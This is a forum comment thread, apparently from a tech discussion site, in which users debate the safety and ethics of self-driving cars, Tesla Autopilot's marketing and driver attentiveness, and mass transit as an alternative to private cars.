How about all those martyred by prolonging our current manual driving system for the years band decades it will take to roll out separate infrastructure for vehicles no one owns because they can't drive them anywhere?
I think we need to keep the human driver in control, but have the computers learning through that constant, immediate feedback.
And get rid of misleading marketing and fatal user experience design errors.
>but have the computers learning through that constant, immediate feedback.
I don't know what is stopping them from simulating everything inside a computer.
Record the input from all the sensors when a car equipped sensors is driven through real roads by a human driver.
Replay the sensor input, with enough random variations and let the algorithms train on it.
Continue adding to the library of sensor data by making the sensor car by driving it through more and more real life roads and in real life situations. Keep feeding the ever increasing library of sensor data to the algorithm, safely inside a computer.
Not following you here. What do you mean by "The map is not the territory."..
What I mean is that. Do not "teach" the thing in real time. Instead collect the sensor data from the cars a human is driving (and also collect the human input also), and train the thing on it, safely inside the lab.
You say, they have done it already. But I am asking if they have done it enough. And if that is so, how come the accidents such as these are possible, when the situation is pretty out of a text book in basic driving?
I don't think it'll take years to update our infrastructure. For example, we could embed beacons into catseyes to make it easier to know where the road boundaries are etc. Also, we could make sections of the highway available with the new infrastructure piece by piece. It is just as progressive as your suggestion, but the problem becomes a whole lot easier to solve when you target change towards infrastructure as well as the car itself.
"I just think we need to stop trying to merge self driving cars into a road system designed for human operators. Moreover, we should not be "beta testing" our self driving cars on roads with human operators."
Sounds like requiring exclusive access - I apologize if that was a misinterpretation.
If you have human and automated drivers in the same roads, the computers have to be able to cope with the vagaries of human drivers.
How can you then get away from '"beta testing" our self driving cars on roads with human operators' if that is their deployment environment?
> I have to preface my post to say that I think developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of thousands of lives in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
This is the definition of a false dichotomy and it implicitly puts the onus on early adopters to risk their lives (!) in order to achieve full autonomy. Why not put the onus on the car manufacturer to invest sufficient capital to make their cars safe!? To rephrase what you said with this perspective:
> ...developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of billions of investor dollars in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
This seems strictly better than the formulation you provided. How nuts is it that the assumption here is that people will have to die for this technology to be perfected. Why not pour 10x or 100x the current level of investment and build entire mock towns to test these cars in - with trained drivers emulating traffic scenarios? Why put profits ahead of people?
This reply is a classic straw man (and one of the main reasons I left Facebook behind). You are making an assumption here that's wrong and I hate that I have to speak to what you've said here because you are reading words that I didn't type. I personally would not choose to put profits ahead of people. But I didn't say anything about profit. I deliberately left profit and money completely out of my post for a reason. You also seem to be suggesting that throwing money at the problem is going to magically make it perfectly safe. You are looking for guarantees and I'm sorry to break it to you, but there are no guarantees in life. "Screws fall out all the time". People are going to die in the process of developing self-driving automobile technology. People are going to die in situations that have nothing to do with self-driving automobile technology. Deaths are inevitable and I am saying that it is worth a perceived significant loss of human life to close the gap using technology so that the number of people dying on the roads every year approaches zero.
> I have to preface my post to say that I think developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of thousands of lives in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
I generally agree with this philosophy but this is very optimistic, at least in the United States. This is a country where we can't even ban assault rifles let alone people from driving their own vehicles. You're going to see people drive their own vehicles for a very long time even if self driving technology is perfected.
I think there is a key point that will result in the freedom of being able to drive being stripped long before assault rifles. Imagine if i create a private road from SF to LA and say that only self driving cars can drive on it. The vehicles on this road are all inter-connected, allowing them to travel at speeds in excess of 150+ MPH, and since the road that i've created is completely flat it still allows it to be a smooth ride. But if i allow cars who's actions can't be predicted (Car driven by a human), it then becomes impossible to safely drive at these speeds. So me, and the road owner, bans cars driven by people on my private toll road. As this becomes more prelevent, i will no longer have the want or need to drive my own car because then it takes me 6 Hours to get to LA instead of 2. All the while there no reason for me to get rid of my assault rifle, because i really enjoy firing it out the window of my self-driving car at 150MPH on the way to LA.
In a train I have to physically go to the train station, park my car, walk and find which train/subway to hop on, sit next to other people on a crowded, confined space, possibly get off and get on another train going to a different destination, get off the the train and walk/ get a rental car to where i want to actually go.
Compare the above to hop in my car, drive to the freeway, turn on self-driving, turn off self-driving once i get off the freeway, find parking near where i'm going and walk in.
As a society, we've done alot more in the name of convenience.
> Are you going to having a train running every few minutes to really make the delays comparable?
Commuter rail systems run at 2 minute headways or less. Long-distance trains mostly don't but that's largely due to excessive safety standards - for some reason we regulate trains to a much higher safety standard than cars. Even then, the higher top speeds of trains can make up for a certain amount of waiting and indirect routing. (Where I live, in London, trains are already faster than cars in the rush hour).
> What's the relative cost of all that vs. pavement?
When you include the land use and pollution? Cars can be cheaper for intercity distances when there's a lot of similarly-sized settlements, but within a city they waste too much space. And once you build cities for people rather than cars, cars lose a lot of their attraction for city-to-city travel as well, since you're in the same situation of having to change modes to get to your final destination.
> for some reason we regulate trains to a much higher safety standard than cars
That "some reason" is physics. According to a quick Google search, an average race car needs 400m of track length from 300 km/h to 0 km/h. A train will require something around 2500m, over 5x the distance, to brake from the same speed. Trains top out at -1.1m/s² deceleration, an ordinary car can get -10m/s² deceleration.
Part of the reason why is also that in a car, people are generally using their seatbelts - which means you can safely hit the brakes with full power. In a train, however, people will be walking around, standing, taking a dump on the loo - and no one will be using a belt. Unless you want to send people literally flying through the carriages, you can't go very much over that 1 m/s² barrier.
Because of this, you have the requirement of signalling blocks spaced in a way that a train at full speed can still come to a full stop before the next block signal. Also: a train can carry thousands of people. Have one train derail and crash into e.g. a bridge or crash with another train and you're looking with way, way, way more injuries and dead people than even a megacity could support, much less in a rural area.
My point is that the overall safety standard is wildly disproportionate even so. The rate of deaths/passenger/mile that we accept as completely normal for cars would be regarded as disastrous for a train system.
I mean, if there’s the demand, sure. Lots of commuter trains run at that sort of rate.
Though your train of cars would likely have such low passenger density that a series of buses would be just as good. Special lanes just for buses are already a thing.
So you exit the self driving private road to enter a public road where there are still local residents who insist on driving their own vehicle. Some of these residents have never been to location X and have no interest in it. They care about their neighborhood and getting around however they want.
The point is driving is a freedom and getting rid of it in this country will be hard. I'd imagine self driving vehicles having more prevalence in China where the government can control what destinations you have access to and monitor your trips.
You'll see municipalities and then states banning cars starting off using soft incentive based approaches, then harder approaches once enough people switch over.
Many states (red) won't ban them for a very long time.
the impact on freedom to travel will have to be secured and decentralized without any government kill switches.
You'll see municipalities and then states banning cars
Which states? Maybe a few in New England, but I don't see that happening anywhere else. Counties perhaps, but there are rural areas pretty much everywhere, and people are going to want the freedom to drive their own vehicle.
Economic incentives and competition will eventually cause it to happen regardless of sentiment. First, insurance rates for manually driven cars will shoot through the roof as less risky drivers moving to self driving cars decimate that risk pool (like if gun owners were required insurance for misuse). Second, cities that go to self driving only will have a huge advantage in infrastructure utilization and costs as roads are used more efficiently (with smoother traffic) and parking lots/garages become a thing of the past. Residents will just push for it if it means not being stuck in traffic anymore. Or worse, people and companies will relocate to cities with exclusive self driving car policies, creating a huge penalty for cities that don’t or can’t do that.
In comparison, the economic impact/benefit of banning assault rifles is negligible (and definitely not transformative) even if I personally think it is the morally right thing to do. (Maybe we can make the case later if school security and active shooter drills become prohibitively expensive and/or annoying)
> Or worse, people and companies will relocate to cities with exclusive self driving car policies
So people will relocate to avoid traffic? Why doesn't this happen today? Suppose San Francisco decided to not enforce self driving laws to protect small businesses and preserve community infrastructure and culture. Now suppose Phoenix (only picked because they've been progressive with self driving technology) does enforce self driving laws, would you expect a mass exodus from San Francisco to Phoenix?
Additionally, it isn't really SF vs. Phoenix. Think global competition: if developing mega cities in Asia adopts this before American cities do, they will be able to more quickly catch up with and very likely exceed their American counter parts in a short period of time economically.
> First, insurance rates for manually driven cars will shoot through the roof as less risky drivers moving to self driving cars decimate that risk pool (like if gun owners were required insurance for misuse).
Why would the less-risky drivers move to self-driving cars first? Wouldn't some of the higher-risk demographics (e.g. the elderly) make the move first since they have more incentive to do so?
> Second, cities that go to self driving only will have a huge advantage in infrastructure utilization and costs as roads are used more efficiently (with smoother traffic) and parking lots/garages become a thing of the past. Residents will just push for it if it means not being stuck in traffic anymore.
I think self-driving cars will be really cool and reduce traffic accidents once they're perfected, but a lot of these assumptions don't make sense. Unless a critical mass switches to car-sharing, autonomous cars and no parking will make rush hour worse because now each car will make the round trip to work twice a day instead of just once. Also, what happens to the real-estate where the parking lots are now? The financially sound thing to do will probably be converting these lots to more offices/condos/malls. So urban density will increase - increasing traffic.
Even if autonomous cars radically improve traffic flow, I suspect we'll just get induced demand [1]. More people will take cars instead of public transit and urban density will increase until traffic sucks again.
> Wouldn't some of the higher-risk demographics (e.g. the elderly)
Elderly aren't usually considered higher risk. The young kids are, enthusiasts are, people who drive red sports cars are.
> Unless a critical mass switches to car-sharing, autonomous cars and no parking will make rush hour worse because now each car will make the round trip to work twice a day instead of just once.
Autonomous cars should be mostly fleet vehicles (otherwise you have to park it at home).
Isn't that just like in most of the major world cities where taxis are the norm rather than the exception? It isn't weird for a taxi in Beijing to make 5-6 morning commute rounds. But even then, there are a lot of reverse commutes to consider.
> The financially sound thing to do will probably be converting these lots to more offices/condos/malls.
While density can increase, convenient affordable personal transportation also allows the opposite to occur. Parks, nice places, and niche destinations, are also possible.
Think of it this way, once traffic is mitigated, urban planning can apply more balance to eliminate uneven reverse commute problems. There will still be an incentive to not move, but movement in itself wouldn't be that expensive (only 40 kuai to get to work in Beijing ~15km, I'm sure given the negligible labor costs, autonomous cars can manage that in the states).
We are asking that self driving cars be ALLOWED if the user chooses, even IF the safety is in doubt. This is because of just how extremely important this issue is.
While I agree with your conclusion, the opening line strikes me as silly. Why is it "so important" to have self-driving cars? These cars that can't detect stationary objects directly in front of them are nowhere close to the self-driving pipe dream that's been around for a century. Maybe by 2118 we'll be making more progress.
Also, people are terrible at detecting objects directly in front of them and just like computers, the human brain can be cheated, overloaded, inept or inexperienced leading to an accident.
Now we have cars with lane assist, smart breaking, auto pilot features and that's only in the past 5-10 years.
Of all the places where technology can save lives, its definitely in vehicles/transportation.
> Also, people are terrible at detecting objects directly in front of them and just like computers, the human brain can be cheated, overloaded, inept or inexperienced leading to an accident.
How many optical illusions do you usually see in the roads while driving, that can result in an accident?
I am not even talking about the "people are terrible at detecting objects directly in front of them" part.
I mean, how can you be a human being and say this? If we were "terrible at detecting objects directly in front of us", we would have been predated out of existence a long time ago..
Dips aren't quite an optical illusion; nor are blind spots, or obscured vehicles (behind frame of the car or behind another vehicle), but those are all quite common and are similar to illusions (you see imperfectly).
Sometimes you'll see multiple white lines, or lanes that appear to vere off due to dirt on the road. A bit of litter looks like a person, a kid looks like they might run out.
A lot of times I find I'm searching for something and can't see it but it was in my visual field. I think this worsens with age.
They're similar in the sense that you don't see what you need to see; in the limited locus of "ability to safely control a vehicle" I consider them similar.
Optical Illusion is not similar to not being able to see an object behind an opaque object. And when you say "brain can be cheated", it means an optical illusion.
That is the only thing I was responding in the start of this discussion. Essentially the person was saying human brain can be cheated just like a computer.
I am saying, No. Not just like a computer. Human brains does not get cheated so easily like a computer. Claiming that is outrageous and shows you have no idea of what you are talking about...
We're not talking about complicated scenarios with multiple moving actors. Tesla's autopilot cannot even do something as basic as detect stationary obstacles that are directly in front of the car. It will crash into barriers even if the highway is completely devoid of other cars.
You may consider humans as bad drivers but Tesla's autopilot is even worse than that:
I'm talking about the pitfalls of human perception, and the low-hanging fruit of ways that self-driving systems can potentially outperform humans.
I'm not claiming Tesla's system is currently better than a human, just that there is plenty of potential for a machine to outperform humans perceptually. As it is, Tesla's system isn't exactly the gold standard.
I am not really sure if development of SDVs is really that important, but even if it were, your proposal would only be acceptable if it were you and Mr. Musk racing your Teslas on Tesla's private proving grounds. Somewhere in the Kalahari desert seems to be an acceptable location. The moment people "making a sacrifice" are unsuspecting customers, and eventually innocent bystanders you are veering very much into Dr. Mengele's territory.
Actually, one thing that I was curious about regarding this incident -- they say that authorities had to wait for a team of Tesla's engineers to show up to clean up burning mess of batteries. Luckily for everyone else trying to get somewhere on 101 that day, Tesla's HQ isn't too far away. What if next time one drives into a barrier it happens in a middle of Wyoming? Will the road stay closed until Tesla's engineers can hitch a ride on one of Musk's Falcons?
So we should kill even more people, who had never signed up to be guinea pigs, so that maybe there will be a self-driving car at some point? Which most of those dying in those crashes will not be able to afford anytime soon anyway...
Thnat's assuming that the replacement actually is safer, which in case of the Auto-Pilot is not the case now, and not necessarily the case ever. There is a reason Waymo isn't unleashing their stuff onto unsuspecting public.
> "I am not really sure if development of SDVs is really that important"
For the 1.3 million people and their loved ones and to 20-50 million injured EVERY YEAR, yeah, it's really that important.
Is it ready today? No. We're in pretty violent agreement on that.
Will we get there? I don't see much reason to doubt that we will, eventually. It may require significant infrastructure changes.
It's pretty clear Waymo/Uber are pushing the envelope too hard, without adequate safeguards, but "only be acceptable if it were you and Mr. Musk...on Tesla's private proving grounds" is probably not pushing the envelope enough.
Even Waymo is "unleashing their stuff onto unsuspecting public" by driving them on public roads - lots of innocent bystanders potentially at risk there.
Both Waymo and even Uber do not pretend that their systems are ready for public use and at least allegedly have people who are paid to take over (granted, in Uber's case it's done as shadily as anything else Uber does). Tesla sells their half-baked stuff to everyone, with marketing that strongly implies that they can do self-driving now, if only not for those pesky validations and regulations. I think there's quite a bit of a difference.
A lot of deaths and injuries on the road happen in countries with bad infrastructure and rather cavalier attitude to rules of the road. Fixing those could save more people sooner than SDVs that they won't be able to afford any time soon. Not to consider that an SDV designed in the first world (well, Bay Area's roads are closer to third world, but still...) aren't going to work too well when everyone around drives like a maniac on a dirt road.
Not to say that SDVs wouldn't be neat, when they actually work, but this is a very SV approach, throwing technology to create overpriced solution to problems that could be solved much cheaper, but in a boring way that doesn't involve AI, ML, NN, and whatever other fashionable abbreviations.
IIRC, it was also Volvo who a few years back said that they would gladly take on any liability issues for their self-driving cars. Only to backtrack on that a short while later after having learned what liability laws in the U.S. actually look like, saying that they wouldn't take on such liability until the laws are changed to be more in their favor. So there's that ...
> because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
Whose lives are we sacrificing? In the case of the Uber crash in Tempe and this Tesla crash in California, the people who died did not volunteer to risk their lives to advance research in autonomous vehicles.
I highly respect individuals who choose to risk their lives to better the world or make progress, like doctors fighting disease in Africa and astronauts going to space, but at the same time, I think this must always be a choice. Otherwise we could justify forcing prisoners to try new drugs as the first stage of clinical trials. Or worse things. Which is why there are extensive vetting before approval for clinical trials is given.
I do think that, once the safety of autonomous vehicles have been proven on a number of testbeds, but before they are ready for deployment, it is justifiable to drive them on public roads. Maybe without safety drivers. But until then, careful consideration should be given to their testing.
Uber should not have been able to run autonomous vehicles with safety drivers where the safety driver could be allowed to look away from the road for several seconds while the car was moving at >30mph. The car should automatically shutoff if it is not clear whether the safety driver is paying attention. And there should be legislation that bans any company that fails to implement basic safeguards like this from testing again for at least a decade, with severe fines. Probably speeds should also be limited to ~30mph for the first few years of testing while the technology is still so immature, as it is today.
Similarly, Tesla should not be allowed to deploy their Autopilot software to consumers before they conduct studies to show that it is reasonably safe. Repeated accidents have shown that Level 1 and Level 2 autonomous vehicles, where the car drives autonomously but the driver must be ready to intervene, is a failed model unless the car actively monitors that the driver is paying attention.
Overall I think justifying the current state of things by saying that people must be sacrificed for this technology to work is ridiculous. Basic safeguards are not being used, and if we require them, maybe autonomous vehicles will take a few years longer to reach deployment, but that thousands of lives could become tens.
Edit: I read in another comment that the Tesla car at least "alarms at you when you take your hands off the wheel". In that case I think what Tesla is doing is much more reasonable. (Not Uber, though.) Although I still feel like it is going to be hard to react to dangerous situations when the system operates correctly almost all the time (even if you are paying attention and have your hands on the wheel). But I'm not sure what the correct policy should be here, because I don't fully understand why people use this in the first place (since it sounds like Autopilot doesn't save you any work).
In that case tesla's autopilot is a red herring. It's not a fully autonomous system. If you're willing to sacrifice human lives then please sacrifice them on systems that actually have a chance of working. Tesla's autopilot isn't one of them, it's most likely never going to reduce the fatality rate below the skill of a sober human because it's just a simple lane keeping and cruise control assistant.
Cars should just be phased out in favor of mass transit everywhere.
Yes, you can live without the convenience of your car. No really, you can.
Now think about how you would enable that to happen. What local politicians are you willing to write to, or support, in order to enable a better mass transit option for you? And how would you enable more people to support those local politicians that make that decision?
This is the correct solution, since the AI solution of self-driving cars isn't going to happen. Their high fatality rates are going to remain high.
Yes, you can live without the convenience of your car. No really, you can.
Maybe, but unless you can change the laws of nature, you can't build a mass transit system that can serve everyone full-time with reasonable efficiency and cost-effectiveness, and that's just meeting the minimum requirement of getting from A to B, without getting into all the other downsides of public vs. private transportation in terms of health, privacy, security, etc.
There's no need to make anything up. Mass transit systems are relatively efficient if and only if they are used on routes popular enough to replace enough private vehicles to offset their greater size and operating costs (both physical and financial). That usually means big cities, or major routes in smaller cities at busier times.
Achieving 24/7 mass transit, available with reasonable frequency for journeys over both short and long distances, would certainly require everyone to live in big cities with very high population densities. Here in the UK, we only have a handful of cities with populations of over one million today. That is the sort of scale you're talking about for that sort of transportation system to be at all viable, although an order of magnitude larger would be more practical. All of those cities have long histories and relatively inefficient layouts, which would make it quite difficult to scale them up dramatically without causing other fundamental problems with infrastructure and logistics.
So, in order to solve the problem of providing viable mass transit for everyone to replace their personal vehicles, you would first need to build, starting from scratch or at least from much smaller urban areas, perhaps 20-30 new big cities to house a few tens of millions of people.
You would then need all of those people to move to those new cities. You'd be destroying all of their former communities in the process, of course, and for about 10,000,000 of them, they'd be giving up their entire rural way of life. Also, since no-one could live in rural areas any more, your farming had better be 100% automated, along with any other infrastructure or emergency facilities you need to support your mass transit away from the big cities.
The UK is currently in the middle of a housing crisis, with an acute lack of supply caused by decades of under-investment and failure to build anywhere close to enough new homes. Today, we're lucky if we build 200,000 per year, while the typical demand is for at least 300,000, which means the problem is getting worse every year. The difference between home-owners and those who are renting or otherwise living in supported accommodation is one of the defining inequalities of our generation, with all the tensions and social problems that follow.
But sure, we could get everyone off private transportation and onto mass transit. All we'd have to do is uproot about 3/4 of our population, destroy their communities and in many cases their whole way of life, build new houses at least an order of magnitude faster than we have managed for the last several decades, achieve total automation in our out-of-city farming and other infrastructure, replace infrastructure for an entire nation that has been centuries in development... and then build all these wonderful new mass transit systems, which would still almost inevitably be worse than private transportation in several fundamental ways.
Why so big though? I lived in a 25 000 people town in Sweden and did not need a car more than a few week ends per year. There was 5 bus lines for local transport, and long distance busses and trains with quite high frequency.
And that's not taking into account the fact that bicycle is a very viable way to move around in cities < 200 000 inhabitants.
I have actually never owned a car, I just rent some once in a while to go out somewhere where regular transports don't get me. I have lived in Sweden, France and Spain, in 10 cities from 25 000 to 12 million inhabitants. Never felt restricted. I actually feel much more restricted when I drive because I have to worry about parking, which is horrible in both Paris and Stockholm. Many people I know, even in rural Sweden or France, don't own a car because it is just super costly and the benefit is not worth it. It's very much a generation thing tough because my friends are mostly around 26-32 whereas nearly all the person I know over 35 owns a car, even if they don't actually have that much money and sometimes complain about it.
You've almost answered your own question, I think. Providing mass transit on popular routes at peak times is relatively easy. It's more difficult when you need to get someone from A to B that is 100 miles away, and then back again the same day. It's more difficult when you are getting someone from A to B at the start of the evening, but their shift finishes at 4am and then they need to get home again.
To provide a viable transport network, operating full-time with competitive journey times, without making a prohibitive financial loss or being environmentally unfriendly, you need a critical mass of people using each service you run. That generally means you need a high enough population density over a large enough urban area that almost all routes become "main routes" and almost all times become "busy times".
You're right. But you're going to have to change the whole of society to achieve that end - from the law, through planning and building, through entertainment, shopping and all, to farming, ... the whole kaboodle.
I lived car free in a small industrial UK city, we couldn't manage that with kids (too expensive for one).
Bus seats are awful, why?, because they're made vandal resistant (and hard wearing). They're too small for a lot of people now as well. So you need to remodel buses IMO; your going to need to be hotter on vandals, so change the approach of the courts. Things bifurcate across areas of society like that: Supermarkets, houses, zoning, etc. all are designed with mass car ownership as a central tenet.
This is certainly possible and I would welcome it but this is something that cannot be done overnight. It will take decades to convince politicians and more decades to upgrade the existing infrastructure.
If you’re willing to die for this, then by all means go ahead and sign up to be a dummy on a test track. If you know other people who feel the same way, sign up as a group. If you’re just talking about letting other people die so that someday, maybe we’ll have fully automated cars, that’s monstrous, especially when they’re not volunteers and don’t get to opt out!
A laudable goal doesn’t give anyone the right to kill people by taking unnecessary risks. The reason that Tesla and Uber do what they do the way they do, instead of a more conservative approach is an attempt to profit, not save lives. If you don’t have to spend lives to make progress, but choose to do so for economic experience, there’s s word for that: evil.
I agree with the psychology aspect of driving. I've seen it mentioned many times that a large majority of auto accidents occur a few minutes from the driver's home, and usually on their way home. Apparently, being close to their neighbourhood and in familiar surrounds, the driver's attention tends to wane as they get distracted with other things that they have to do when they get to their house.
Racing drivers have also reported that when they are not driving at 100%, they are more prone to make mistakes or crash. Most famously, Ayrton Senna's infamous crash at Monaco when he was leading the field by a LONG way. When he was asked why he crashed at a fairly innocuous slow corner, he said that his engineer had asked him over the radio to 'take it easy' as there was no chance he would be challenged for 1st place before the finish line, so he relaxed a fraction and started thinking about the victory celebrations. And crashed.
>I don't even enable cruise control because taking the accelerator input away from me is enough to cause my mind to wander
You're not alone. I find the act of modulating my speed is what keeps me focused on the task of driving safely. Steering alone isn't enough; I can stay in my lane without tracking the vehicles around me or fully comprehending road conditions.
Until a Level 5 autonomous car is ready to drive me point A to point B while I watch a movie I will remain firmly in command of the vehicle.
The problem as always with driving is that you can be as attentive, sober, cautious as humanly possible... while the guy who jumps the median into your windscreen may not be. We need to be more concerned and proactive about stopping this running experiment with half-asses automation in which we all unwillingly participate. I want lvl 5 automation just like anyone, but I don’t believe it’s anywhere close, and I’m not interested in being part of a Tesla or Uber’s attempt to be even richer.
Public roads are not laboratories. It’s not just Tesla owners who are participating in this, it’s everyone on the road with them.
Noticed this also, no need to monitor and adjust the speed which is a mundane task (in cruise control traffic conditions). Eyes can be on the road instead.
This is similar to the problem for pilots, who can be distracted by mundane tasks due the complexity of controls in modern aircraft. If these tasks are removed, the pilot can focus on what's more important.
According to NASA "
For the most part, crews handle concurrent task demands efficiently, yet crew preoccupation with one task to the detriment of other tasks is one of the more common forms of error in the cockpit."
I think growing up in a snowy climate where super precise throttle control is critical to not ending up in ditches plays a huge role in why I zone out when using cruise control. The fine motor skill of throttle control occupies the back of my mind while my conscious thoughts rotate through the mirrors, track other vehicles and watch for obstacles. I can maintain a speed within a couple km/hr for a very long time without needing to glance at the speedo at all.
The moment the back of my mind doesn't have to handle precise throttle control I find my mind wandering and my spacial awareness is shot. I guess maintaining speed is the fidget spinner that keeps me focused on the task of driving.
I totally agree with this sentiment -- the only reason I drive a safe speed is that I use cruise control constantly. Then I don't have to think about speed, and I can focus on everything else.
Adaptive cruise control is a bit annoying in traffic, as the safety buffer causes cars who don’t care about tailgating to easily move into the gap causing my speed to jolt around a lot (and eventually get stuck behind some slow moving vehicle). It just doesn’t work well in heavy two lane traffic I guess.
> This needs far more discussion. I just don't buy it. I don't believe that you can have a car engaged in auto-drive mode and remain attentive. I think our psychology won't allow it.
Does anyone know of psychology studies that measure human reaction time and skill when sometime like autopilot is engaged most of the time? I remember taking part in a similar study at Georgia Tech that involved firing at a target using a joystick. It was also simultaneously a contest because only the top scorer would get prize money. The study was conducted in two parts. In the 1st phase, the system had autotargeting engaged. All subjects had to do was press a button when the reticle was on the target in order to score. In the 2nd phase, which was a surprise, autotargetting was turned off. I won the contest and my score was miles ahead of anyone. I can't fully confirm it but I feel this happened because I was still actively aiming for the target even when autotargetting was active.
Does anyone know of psychology studies that measure human reaction time and skill when sometime like autopilot is engaged most of the time?
Yes. That's been much studied in the aviation community.[1] NASA has the Multi-Attribute Test Battery to explicitly study this.[2] It runs on Windows with a joystick, and is available from NASA. The person being tested has several tasks, one of which is simply to keep a marker on target with the joystick as the marker drifts. This simulates the most basic flying task - flying straight and level. This task can be put on "autopilot", and when the marker drifts, the "autopilot" will simulate moving the joystick to correct the position.
But sometimes the "autopilot" fails, and the marker starts drifting. The person being tested is supposed to notice this and take over. How long that takes is measured. That's exactly the situation which applies with Tesla's "autopilot".
There are many studies using MATB. See the references. This is well explored territory in aviation.
As a user of autopilot in aviation context, I do remain engaged and connected to the flight while the autopilot handles the routine course following and altitude hold/tracking responsibilities.
I don’t find that particularly challenging and in fact, when the autopilot is INOP, flights are slightly more mentally fatiguing because you have no offload and complex arrivals are much more work, but in cruise, you have to be paying attention either way. It’s not a time to read the newspaper, autopilot or not.
Quite a lot years ago I had to drive for 6 hours straight at night to get on time to place where I needed to be (air flight was not available back then for me)
What I noticed that when I was following posted/safe speed limit, I was quickly losing focus, mind started wandering and eventually I felt I was falling asleep.
I do not remember what made me to speed up, but once I was about 30% faster than posted speed limits, and once I reached part of the way where road was quite bad + a lot of road work was happening, I realized that I much more alert.
As soon as I slowed down to posted speed limit speed I began drifting away again..
If anything, my anecdote confirms your theory - as soon as we perceive something safer, we pay way less attention. And Autopilot sounds like one of these safety things, which makes drivers less attentive and potentially missing dangerous situation, which otherwise would be caught by driver's mind.
I wonder if there is a way to introduce autopilot help without actually giving sense of security to the driver. Granted Tesla would lose so precious marketing angle, but if their autopilot would work somewhat like variable power steering system on background without obvious taking over control of the car, in the long haul that would be more beneficial?
Assuming you were in a vehicle with ICE speed relates to vibration/noise which can, at the wrong pitch, cause drowsiness easily. This is why parents will take their children out in the car if a child is not sleeping well.
I find rough motorway surfaces in my current vehicle induce heavy drowsiness at motorway speed limits (slight reduced at marginally higher speeds when the pitch is higher).
Your belief is meaningless, we have hard data that shows a net benefit to these systems.
It's not a question of zero deaths, it's a question of reducing the number which means you need to look beyond individual events. Remember the ~90 people who died yesterday from a US car accident without making the news are far more important than a few individuals.
>> our belief is meaningless, we have hard data that shows a net benefit to these systems.
No we don't. Tesla likes to compare their deaths per mile to the national average. The problem is that their autopilot is not fit to drive everywhere or in all conditions that go into that average. There is no data to support that autopilot is safer overall. It may not even be safer in highway conditions given that we've seen it broadside a semi and now deviate from the lane into a barrier - both in normal to good conditions.
Specific failures are again meaningless. Computers don't fail the way people do, on the other hand people also regularly fall asleep at the wheel and do similar dumb things.
And really, driving conditions are responsible for a relatively small percentage of vehicle fatalities. Most often it's people doing really dumb things like driving 100+ MPH.
The only thing we actually know is these cars are safer on average than similar cars without these systems. That's not looking at how much they are used, just the existence of said safety system and likely relates to them being used when the drivers are extremely drunk or tired which are both extremely dangerous independent of weather conditions.
So how about we adopt much cheaper and simpler solutions like drowsiness detection (Volvos have these), automatic emergency braking (I think every brand has this as an option now), breathalizer locks, speed limiters etc?
The US just mandated all new cars have backup cameras, but it seems like mandating AEB would make a bigger difference.
Your belief is meaningless, we have hard data that shows a net benefit to these systems.
What do you know that the rest of us don't? The ones statistics I've seen on anyone's self-driving cars so far would barely support a hypothesis that they are as capable as an average driver in an average car while operating under highly favourable conditions.
>I don't believe that you can have a car engaged in auto-drive mode and remain attentive
I've been saying this for a while and it's interesting to see more people evolve to this point of view. There was a time when this idea was unpopular here--owed mostly to people claiming that autonomous cars are still safer than humans, so the risks were acceptable. I think there are philosophical and moral reasons why this is not good enough, but that goes off-topic a bit.
In any case, some automakers have now embraced the Level-5 only approach and I sincerely believe that goal will not be achieved until either:
1. We achieve AGI or
2. Our roads are inspected and standards are set to certify them for autonomous vehicles (e.g. lane marking requirements, temporary construction changes, etc.)
Otherwise, I don't believe we can simply unleash autonomous vehicles on any road in any conditions and expect them to perform perfectly. I also believe it's impossible to test for every scenario. The recent dashcam videos have convinced me further of this [0].
The fact that there are "known-unknowns" in the absence of complete test-ability is one major reason that "better than humans" is not an ethical standard. We simply can't release vehicles to the open roads when we know there are any situations in which a human would outperform them in potentially life-saving ways.
I suppose its perhaps how they marketed the feature. We have parking assist feature in many cars, there's a reason its not auto-park instead. If it really was a feature to help attentive drivers avoid accidents, it probably would have been called a driving-assist tech and not auto-pilot.
I agree, I find the same of myself, and I beat myself up over any loss of concentration.
The solution might be a system where the driver drives at a higher level of abstraction, but ultimately still drives.
Driving should be like declarative programming.
For example, the driver still moves the steering wheel left and right, but the car handles the turn.
Or when the driver hits the breaks, which is now more of a on/off switch, the car handles the breaking.
The role for the driver is to remain engaged, indicating their intention at every moment and for the car to work out the details.
Edit: On second thought, that might end up being worse. I can think of situations where it might become ambiguous to the driver of what they are handling and what the car is handling. Maybe autopilot is all or nothing.
> When driving, I find that I must be engaged and on long trips I don't even enable cruise control because taking the accelerator input away from me is enough to cause my mind to wander.
Glad I'm not the only doing it. When driving on a highway I increase or decrease my car's speed by 10-15 km every 10 minutes or so, so that this variation can help me keep attentive about my surroundings.
This comparison really only works if you mean engaging autopilot with a bunch of other planes flying in close formation and if clouds were made of steel and concrete. Most of the time that autopilot is engaged on a flight there is next to zero risk of a collision. Commercial pilots also get a lot of training specifically related to what autopilot is and isn’t appropriate for.
Even as a private pilot you are taught to continuously scan your instruments and surroundings as you fly through the air with autopilot enabled. Flight training is much more extensive than driving tests (although still not too bad) and they really drive procedures into you.
Which is why pilots are still in control of the plane while autopilot is active. Even while active, there is still a "pilot flying" and pilots are still responsible for scanning gauges and readouts and verifying the autopilot is doing what they expect. They do not just turn on autopilot and goof off
Just like Tesla's auto pilot? Drivers are supposed to be "flying", scanning gauges and the road ahead to ensure the autopilot is doing what they expect...
I think people that say that "autopilot" is a bad name for this feature don't really understand what an "autopilot" does.
The text at the top of the homepage for Tesla Autopilot is this:
> Full Self-Driving Hardware on All Cars
> All Tesla vehicles produced in our factory, including Model 3, have the hardware needed for full self-driving capability at a safety level substantially greater than that of a human driver.
Whatever theory you have for Tesla's naming of their feature, it doesn't match with their marketing.
You are reading into that text more than you should. Autopilot and full self-driving are two separate features. Autopilot can be used today. Full self-driving can be purchased today but won't be activated until some unknown future date. Those features are separate configurable options when purchasing the car that come with their own prices. Tesla makes it clear enough that any owner should know those are two separate features. The text you highlighted is simply promising that any car purchased today can activate full self-driving down the line with no additional hardware costs.
> You are reading into that text more than you should.
